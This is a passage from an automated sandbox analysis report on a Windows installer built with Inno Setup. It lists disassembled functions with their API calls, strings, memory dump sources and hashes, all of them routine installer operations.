Instruction ID: 88cce81a25e8d2b86f0fb0c4d26653f0a59eab0d1c2541fbda2dfec8285107fa
Opcode Fuzzy Hash: 640796b35c0a1ce75f6c4b4bb4fc8d3f53e1284a214d4f024413820b30621cc0
Instruction Fuzzy Hash: 0CC0C9E0644700E99A00B7B2ACC6A77255CD500B24351843B7159AA183D67C48008E6D

Function 0041B518 Relevance: 9.1, APIs: 6, Instructions: 113windowCOMMON

Download Yara Rule

APIs

GetFocus.USER32 ref: 0041B58E
73A1A570.USER32(?,00000000,0041B668,?,?,?,?), ref: 0041B59A
73A24620.GDI32(?,00000068,00000000,0041B63C,?,?,00000000,0041B668,?,?,?,?), ref: 0041B5B6
73A4E680.GDI32(?,00000000,00000008,?,?,00000068,00000000,0041B63C,?,?,00000000,0041B668,?,?,?,?), ref: 0041B5D3
73A4E680.GDI32(?,00000000,00000008,?,?,00000000,00000008,?,?,00000068,00000000,0041B63C,?,?,00000000,0041B668), ref: 0041B5EA
73A1A480.USER32(?,?,0041B643,?,?), ref: 0041B636

Memory Dump Source

Source File: 00000000.00000002.2080154679.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2080141156.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.0000000000498000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.000000000049C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080228321.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: E680$A24620A480A570Focus
String ID:
API String ID: 3709697839-0
Opcode ID: 90736dfb4065eff224967c8bcb4d67110e7e5550b3a77470f42cb8b0a49e908e
Instruction ID: 7d41d09f6123fe0998bcf531a8d6f09bc5b1e179d78523dd82c4b1b978091a2c
Opcode Fuzzy Hash: 90736dfb4065eff224967c8bcb4d67110e7e5550b3a77470f42cb8b0a49e908e
Instruction Fuzzy Hash: 7E41D571A04254AFDB10DFA9C886EAFBBB4EB55704F1484AAF500EB351D3389D11CBA5

Function 0045C86C Relevance: 9.1, APIs: 2, Strings: 4, Instructions: 73COMMON

Download Yara Rule

APIs

SetLastError.KERNEL32(00000057,00000000,0045C938,?,?,?,?,00000000), ref: 0045C8D7
SetLastError.KERNEL32(00000000,00000002,?,?,?,0045C9A4,?,00000000,0045C938,?,?,?,?,00000000), ref: 0045C916

Strings

CLASSES_ROOT, xrefs: 0045C89C
USERS, xrefs: 0045C8C9
CURRENT_USER, xrefs: 0045C8AB
MACHINE, xrefs: 0045C8BA

Memory Dump Source

Source File: 00000000.00000002.2080154679.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2080141156.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.0000000000498000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.000000000049C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080228321.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: ErrorLast
String ID: CLASSES_ROOT$CURRENT_USER$MACHINE$USERS
API String ID: 1452528299-1580325520
Opcode ID: 99b9f16503f7becb970105185d504024fca331f7ffa254ae058b9f8b432b0c4b
Instruction ID: 4bc6690761fff3477fd1c78266aa95ca77ca80276c31c8ced3a67731b9c061d7
Opcode Fuzzy Hash: 99b9f16503f7becb970105185d504024fca331f7ffa254ae058b9f8b432b0c4b
Instruction Fuzzy Hash: C411A5B5204304AFE711EAA1C9C1BAA76ADDB44707F6040776D00A6283D63C9F0AA56D

Function 0041BD9C Relevance: 9.1, APIs: 6, Instructions: 71COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32(0000000B), ref: 0041BDE5
GetSystemMetrics.USER32(0000000C), ref: 0041BDEF
73A1A570.USER32(00000000,0000000C,0000000B,?,?,00000000,?), ref: 0041BDF9
73A24620.GDI32(00000000,0000000E,00000000,0041BE6C,?,00000000,0000000C,0000000B,?,?,00000000,?), ref: 0041BE20
73A24620.GDI32(00000000,0000000C,00000000,0000000E,00000000,0041BE6C,?,00000000,0000000C,0000000B,?,?,00000000,?), ref: 0041BE2D
73A1A480.USER32(00000000,00000000,0041BE73,0000000E,00000000,0041BE6C,?,00000000,0000000C,0000000B,?,?,00000000,?), ref: 0041BE66

Memory Dump Source

Source File: 00000000.00000002.2080154679.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2080141156.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.0000000000498000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.000000000049C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080228321.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: A24620MetricsSystem$A480A570
String ID:
API String ID: 4042297458-0
Opcode ID: ac68926fe92e1edab0c70053485f8ed6fe458f78b1884b8088fd3f2024b93da0
Instruction ID: cee0947e7f2791638d7e7c91bd9cc57ffb528c4a132e606019bcc307a049f0f1
Opcode Fuzzy Hash: ac68926fe92e1edab0c70053485f8ed6fe458f78b1884b8088fd3f2024b93da0
Instruction Fuzzy Hash: 40212C74E046499FEB00EFA9C982BEEB7B4EB48714F10842AF514B7781D7785940CBA9

Function 0041364C Relevance: 9.1, APIs: 6, Instructions: 60COMMON

Download Yara Rule

APIs

SetWindowLongA.USER32(?,000000FC,?), ref: 00413674
GetWindowLongA.USER32(?,000000F0), ref: 0041367F
GetWindowLongA.USER32(?,000000F4), ref: 00413691
SetWindowLongA.USER32(?,000000F4,?), ref: 004136A4
SetPropA.USER32(?,00000000,00000000), ref: 004136BB
SetPropA.USER32(?,00000000,00000000), ref: 004136D2

Memory Dump Source

Source File: 00000000.00000002.2080154679.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2080141156.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.0000000000498000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.000000000049C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080228321.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: LongWindow$Prop
String ID:
API String ID: 3887896539-0
Opcode ID: f3fe35187a7c1c9d5e5b286bbae8f081611be039bb05b0364af94d978d137136
Instruction ID: 1bc0ad651c9199286e8a44efdb6fe1d3d914d8875e882f3995fbdb6b4a12be9e
Opcode Fuzzy Hash: f3fe35187a7c1c9d5e5b286bbae8f081611be039bb05b0364af94d978d137136
Instruction Fuzzy Hash: BD11DD75500244BFDB00DF9DDC84E9A3BECEB19364F104676B918DB2A1D738D990CB94

Function 00401A90 Relevance: 9.1, APIs: 6, Instructions: 59COMMON

Download Yara Rule

APIs

RtlEnterCriticalSection.KERNEL32(0049A420), ref: 00401ABD
LocalFree.KERNEL32(0055A620,00000000,00401B68), ref: 00401ACF
VirtualFree.KERNEL32(02180000,00000000,00008000,0055A620,00000000,00401B68), ref: 00401AEE
LocalFree.KERNEL32(0055B620,02180000,00000000,00008000,0055A620,00000000,00401B68), ref: 00401B2D
RtlLeaveCriticalSection.KERNEL32(0049A420), ref: 00401B58
RtlDeleteCriticalSection.KERNEL32(0049A420), ref: 00401B62

Memory Dump Source

Source File: 00000000.00000002.2080154679.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2080141156.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.0000000000498000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.000000000049C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080228321.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: CriticalFreeSection$Local$DeleteEnterLeaveVirtual
String ID:
API String ID: 3782394904-0
Opcode ID: 129a086d14f06e85949d9ce6c11842cbaac0837872500e74c5770b3ac3f1f746
Instruction ID: 4ef907ce7de5879ae286245a644ba6b68361dc01c28fd2a698a6758b772d8c96
Opcode Fuzzy Hash: 129a086d14f06e85949d9ce6c11842cbaac0837872500e74c5770b3ac3f1f746
Instruction Fuzzy Hash: C9114270A403405AEB15AB659C89B263BE597A570CF54407BF80067AF2D7BC5860C7EF

Function 0047CE74 Relevance: 9.1, APIs: 6, Instructions: 57COMMON

Download Yara Rule

APIs

GetWindowLongA.USER32(0001041A,000000EC), ref: 0047CE82
SetWindowPos.USER32(0001041A,00000000,00000000,00000000,00000000,00000000,00000097,0001041A,000000EC,?,0046BEC1), ref: 0047CEA8
GetWindowLongA.USER32(0001041A,000000EC), ref: 0047CEB8
SetWindowLongA.USER32(0001041A,000000EC,00000000), ref: 0047CED9
ShowWindow.USER32(0001041A,00000005,0001041A,000000EC,00000000,0001041A,000000EC,0001041A,00000000,00000000,00000000,00000000,00000000,00000097,0001041A,000000EC), ref: 0047CEED
SetWindowPos.USER32(0001041A,00000000,00000000,00000000,00000000,00000000,00000057,0001041A,000000EC,00000000,0001041A,000000EC,0001041A,00000000,00000000,00000000), ref: 0047CF09

Memory Dump Source

Source File: 00000000.00000002.2080154679.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2080141156.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.0000000000498000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.000000000049C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080228321.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: Window$Long$Show
String ID:
API String ID: 3609083571-0
Opcode ID: d5023a2a3b9a42864c161951c9a2011fede77d25d894d4fb326090ebf2ee6517
Instruction ID: 53f4afee34405168921573d6abf47edcf93367c04ab8e422678ad5c4be4c5700
Opcode Fuzzy Hash: d5023a2a3b9a42864c161951c9a2011fede77d25d894d4fb326090ebf2ee6517
Instruction Fuzzy Hash: B4015EB2645310ABD700D768CD81F263798AB0D338F09066AF999DF3E2C639DC509B4D

Function 0041B280 Relevance: 9.0, APIs: 6, Instructions: 43COMMON

Download Yara Rule

APIs

Part of subcall function 0041A6F0: CreateBrushIndirect.GDI32 ref: 0041A75B

UnrealizeObject.GDI32(00000000), ref: 0041B28C
SelectObject.GDI32(?,00000000), ref: 0041B29E
SetBkColor.GDI32(?,00000000), ref: 0041B2C1
SetBkMode.GDI32(?,00000002), ref: 0041B2CC
SetBkColor.GDI32(?,00000000), ref: 0041B2E7
SetBkMode.GDI32(?,00000001), ref: 0041B2F2

Part of subcall function 0041A068: GetSysColor.USER32(?), ref: 0041A072

Memory Dump Source

Source File: 00000000.00000002.2080154679.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2080141156.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.0000000000498000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.000000000049C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080228321.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: Color$ModeObject$BrushCreateIndirectSelectUnrealize
String ID:
API String ID: 3527656728-0
Opcode ID: 040caad6ebeb90478066d2bb7b9115770ac54e43de5888fa90ff69ea82d38fb6
Instruction ID: 5f3c9a08814bcb0dec11b684bd4148c9aa8da507e688bf70d4fc6563dceee2e6
Opcode Fuzzy Hash: 040caad6ebeb90478066d2bb7b9115770ac54e43de5888fa90ff69ea82d38fb6
Instruction Fuzzy Hash: 7EF0C2B1651501ABCE00FFBAD9CAE4B37A89F043097088057B544DF197C97CD8548B3D

Function 00454C04 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 142registryCOMMON

Download Yara Rule

APIs

Part of subcall function 0042DD44: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,[!H,?,00000001,?,?,0048215B,?,00000001,00000000), ref: 0042DD60

RegCloseKey.ADVAPI32(?,?,00000001,00000000,00000000,00454D9B,?,00000000,00454DDB), ref: 00454CE1

Strings

PendingFileRenameOperations, xrefs: 00454C80
PendingFileRenameOperations2, xrefs: 00454CB0
WININIT.INI, xrefs: 00454D10
SYSTEM\CurrentControlSet\Control\Session Manager, xrefs: 00454C64

Memory Dump Source

Source File: 00000000.00000002.2080154679.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2080141156.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.0000000000498000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.000000000049C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080228321.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: CloseOpen
String ID: PendingFileRenameOperations$PendingFileRenameOperations2$SYSTEM\CurrentControlSet\Control\Session Manager$WININIT.INI
API String ID: 47109696-2199428270
Opcode ID: 6fa536c3f680b3eefdb0c1d7f45b9c331d969c911810875248960f9d986f431f
Instruction ID: f0141262be7a00e61dcd825f0f006365f3ff03c75eb903519351dbfe0bd0c0d1
Opcode Fuzzy Hash: 6fa536c3f680b3eefdb0c1d7f45b9c331d969c911810875248960f9d986f431f
Instruction Fuzzy Hash: 13519B70E002089FDB11EF61DC519DEB7B9EB84309F50857BE804EB282D778AE49CA18

Function 00496424 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 97COMMON

Download Yara Rule

APIs

Part of subcall function 004242D4: SetWindowTextA.USER32(0001041A,00000000), ref: 004242EC

ShowWindow.USER32(0001041A,00000005,00000000,00496689,?,?,00000000), ref: 0049645A

Part of subcall function 0042D890: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8A3

Part of subcall function 004072B0: SetCurrentDirectoryA.KERNEL32(00000000,?,00496482,00000000,00496655,?,0001041A,00000005,00000000,00496689,?,?,00000000), ref: 004072BB

Part of subcall function 0042D418: GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,0042D4A6,?,?,?,00000001,?,004555AA,00000000,00455612), ref: 0042D44D

Strings

Uninstall, xrefs: 00496440
.dat, xrefs: 004964A1
.msg, xrefs: 004964C0
IMsg, xrefs: 0049652E

Memory Dump Source

Source File: 00000000.00000002.2080154679.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2080141156.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.0000000000498000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.000000000049C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080228321.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: DirectoryWindow$CurrentFileModuleNameShowSystemText
String ID: .dat$.msg$IMsg$Uninstall
API String ID: 3312786188-1660910688
Opcode ID: ee30b8fee04e719e0d735c642a39edc2a72ce06674f8f07ea56ba168d7246cca
Instruction ID: 62c63900fa16ef0985a3414d27717776778dc10f526a4304b6ec2729ed654e37
Opcode Fuzzy Hash: ee30b8fee04e719e0d735c642a39edc2a72ce06674f8f07ea56ba168d7246cca
Instruction Fuzzy Hash: 83319274A006149FCB00FF65DD5295E7BB5EB49308B52887AF400AB7A6CB38AD04DB98

Function 004968D8 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 83COMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32(00000000,(rI,00000000,004969CE,?,?,00000000,0049A628), ref: 00496948
SetFileAttributesA.KERNEL32(00000000,00000000,00000000,(rI,00000000,004969CE,?,?,00000000,0049A628), ref: 00496971
MoveFileExA.KERNEL32(00000000,00000000,00000001(MOVEFILE_REPLACE_EXISTING)), ref: 0049698A

Strings

(rI, xrefs: 00496917, 00496931, 004969C0, 0049691A
isRS-%.3u.tmp, xrefs: 00496927

Memory Dump Source

Source File: 00000000.00000002.2080154679.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2080141156.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.0000000000498000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.000000000049C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080228321.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: File$Attributes$Move
String ID: (rI$isRS-%.3u.tmp
API String ID: 3839737484-3836573314
Opcode ID: 8e02207c5160ec9781726539de95246870ab3cb049304dc91e1cea3038a39e37
Instruction ID: a7fff72c20bdfc84bde37009071cf3b2714fa55b1c9600803885d9d98029213d
Opcode Fuzzy Hash: 8e02207c5160ec9781726539de95246870ab3cb049304dc91e1cea3038a39e37
Instruction Fuzzy Hash: AA2167B1E00219AFCF01EFA9C981AAFBBF8EB44314F51453BB414F72D1D6385E018A59

Function 00423A94 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 55COMMON

Download Yara Rule

APIs

EnumWindows.USER32(00423A2C), ref: 00423AB8
GetWindow.USER32(?,00000003), ref: 00423ACD
GetWindowLongA.USER32(?,000000EC), ref: 00423ADC
SetWindowPos.USER32(00000000,lAB,00000000,00000000,00000000,00000000,00000013,?,000000EC,?,?,?,004241BB,?,?,00423D83), ref: 00423B12

Strings

lAB, xrefs: 00423B02, 00423B06

Memory Dump Source

Source File: 00000000.00000002.2080154679.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2080141156.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.0000000000498000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.000000000049C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080228321.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: Window$EnumLongWindows
String ID: lAB
API String ID: 4191631535-3476862382
Opcode ID: ac83dcd26946572d973140af976460ec6b841e514006ae286109fe1e17b4d41b
Instruction ID: d29b09d819a87149adbd2d005cf1232ad5b3f4e75eba8ff45bdb535110d2bb0d
Opcode Fuzzy Hash: ac83dcd26946572d973140af976460ec6b841e514006ae286109fe1e17b4d41b
Instruction Fuzzy Hash: 3C115E70700610ABDB109F28DC85F5A77E8EB04725F50026AF9A49B2E7C378DD40CB59

Function 0042E91C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 49libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(user32.dll,ShutdownBlockReasonCreate), ref: 0042E94E
GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042E954
MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000FFF,00000000,user32.dll,ShutdownBlockReasonCreate), ref: 0042E97D

Strings

ShutdownBlockReasonCreate, xrefs: 0042E944
user32.dll, xrefs: 0042E949

Memory Dump Source

Source File: 00000000.00000002.2080154679.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2080141156.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.0000000000498000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.000000000049C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080228321.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: AddressByteCharHandleModuleMultiProcWide
String ID: ShutdownBlockReasonCreate$user32.dll
API String ID: 828529508-2866557904
Opcode ID: 95cac51ff1703e16a09974d72cafe73de94b216edefc1d1335a3e5435fcce052
Instruction ID: 1d35fa7d7a5cedd0232cd267efd28fbcee77054966ca8dd586963fa292d83f31
Opcode Fuzzy Hash: 95cac51ff1703e16a09974d72cafe73de94b216edefc1d1335a3e5435fcce052
Instruction Fuzzy Hash: 58F0C2E134062136E660A67BACC2F6B15CC8F94729F54003BB108EA2C2E96C8945426F

Function 004572F0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 45COMMON

Download Yara Rule

APIs

MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 00457320
GetExitCodeProcess.KERNEL32(?,00496E0E), ref: 00457341
CloseHandle.KERNEL32(?,00457374,?,?,00457B8F,00000000,00000000), ref: 00457367

Strings

GetExitCodeProcess, xrefs: 0045734A
MsgWaitForMultipleObjects, xrefs: 0045732D

Memory Dump Source

Source File: 00000000.00000002.2080154679.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2080141156.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.0000000000498000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.000000000049C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080228321.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: CloseCodeExitHandleMultipleObjectsProcessWait
String ID: GetExitCodeProcess$MsgWaitForMultipleObjects
API String ID: 2573145106-3235461205
Opcode ID: 189a83f38a3b5cf7a85c08ed25bf90f3de2c670a6e40b96d30189081d2039c55
Instruction ID: 4a074e93e4ab88470b46d36102555543fa5a99f4012040e6d914a5d3a66b8e8b
Opcode Fuzzy Hash: 189a83f38a3b5cf7a85c08ed25bf90f3de2c670a6e40b96d30189081d2039c55
Instruction Fuzzy Hash: B401A230608204AFDB11EF999D42E5E73E8EB49724F2041B7BC10D73D2D67CAD04E658

Function 004534C2 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 43fileCOMMON

Download Yara Rule

APIs

SetFileAttributesA.KERNEL32(00000000,00000020), ref: 004534CF

Part of subcall function 00406F58: DeleteFileA.KERNEL32(00000000,0049A628,00496DB9,00000000,00496E0E,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000), ref: 00406F63

MoveFileA.KERNEL32(00000000,00000000), ref: 004534F4

Part of subcall function 00452B0C: GetLastError.KERNEL32(00000000,0045357D,00000005,00000000,004535B2,?,?,00000000,0049A628,00000004,00000000,00000000,00000000,?,00496A6D,00000000), ref: 00452B0F

Strings

DeleteFile, xrefs: 004534E0
MoveFile, xrefs: 004534FD
(rI, xrefs: 004535A4

Memory Dump Source

Source File: 00000000.00000002.2080154679.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2080141156.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.0000000000498000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.000000000049C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080228321.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: File$AttributesDeleteErrorLastMove
String ID: (rI$DeleteFile$MoveFile
API String ID: 3024442154-2098259748
Opcode ID: 1e769c0763f167c2234085e02683a04ac493dbde30fa175daae9c4a280f2e68b
Instruction ID: 70eb457cff55a4d5f9d98fb722c0821592184d165c2451b26ab6992e5a9cd8f1
Opcode Fuzzy Hash: 1e769c0763f167c2234085e02683a04ac493dbde30fa175daae9c4a280f2e68b
Instruction Fuzzy Hash: 32F086706041046AEB01FFA5D95266E67ECDB4434BFA0443BF800B76C3DA3C9E09893D

Function 0042DD6C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 32registrylibraryloaderCOMMON

Download Yara Rule

APIs

RegDeleteKeyA.ADVAPI32(00000000,00000000), ref: 0042DD78
GetModuleHandleA.KERNEL32(advapi32.dll,RegDeleteKeyExA,?,00000000,0042DF13,00000000,0042DF2B,?,?,?,?,00000006,?,00000000,00495ECB), ref: 0042DD93
GetProcAddress.KERNEL32(00000000,advapi32.dll), ref: 0042DD99

Strings

RegDeleteKeyExA, xrefs: 0042DD89
advapi32.dll, xrefs: 0042DD8E

Memory Dump Source

Source File: 00000000.00000002.2080154679.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2080141156.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.0000000000498000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.000000000049C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080228321.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: AddressDeleteHandleModuleProc
String ID: RegDeleteKeyExA$advapi32.dll
API String ID: 588496660-1846899949
Opcode ID: cdd4dffc1335645daf9076e4b90581e738cb46d78c07f14505df1b0a5e43863c
Instruction ID: 8fc99b955978393d7b704f32c9200af3e348b3abe20e6a9a0cbb7a4975712069
Opcode Fuzzy Hash: cdd4dffc1335645daf9076e4b90581e738cb46d78c07f14505df1b0a5e43863c
Instruction Fuzzy Hash: AFE022F0B91A30AAC72023A9BC4AFA32B28CF60725F985137F081B51D182BC0C40CE9C

Function 0042E890 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 30libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(user32.dll,ChangeWindowMessageFilterEx,00000004,00498934,004564E9,0045688C,00456440,00000000,00000B06,00000000,00000000,00000001,00000000,00000002,00000000,0047FACB), ref: 0042E8A9
GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042E8AF
InterlockedExchange.KERNEL32(0049A668,00000001), ref: 0042E8C0

Part of subcall function 0042E820: GetModuleHandleA.KERNEL32(user32.dll,ChangeWindowMessageFilter,?,0042E8E4,00000004,00498934,004564E9,0045688C,00456440,00000000,00000B06,00000000,00000000,00000001,00000000,00000002), ref: 0042E836
Part of subcall function 0042E820: GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042E83C
Part of subcall function 0042E820: InterlockedExchange.KERNEL32(0049A660,00000001), ref: 0042E84D

Strings

user32.dll, xrefs: 0042E8A4
ChangeWindowMessageFilterEx, xrefs: 0042E89F

Memory Dump Source

Source File: 00000000.00000002.2080154679.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2080141156.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.0000000000498000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.000000000049C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080228321.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: AddressExchangeHandleInterlockedModuleProc
String ID: ChangeWindowMessageFilterEx$user32.dll
API String ID: 3478007392-2676053874
Opcode ID: 23d268f939a9316d23fc642c2092c688ca2a4922f764801fc9776e819e61df6b
Instruction ID: c365c5bc722f159dc4e6bf90002f67a18111edd1cc3b7a2fef3254202be3c5aa
Opcode Fuzzy Hash: 23d268f939a9316d23fc642c2092c688ca2a4922f764801fc9776e819e61df6b
Instruction Fuzzy Hash: 02E092A1341720AAEB1077B77C8AF9A2258CB11729F5C4037F180A61D2C6BD0C90CE9E

Function 0042E820 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 20libraryloaderCOMMON

Download Yara Rule

APIs

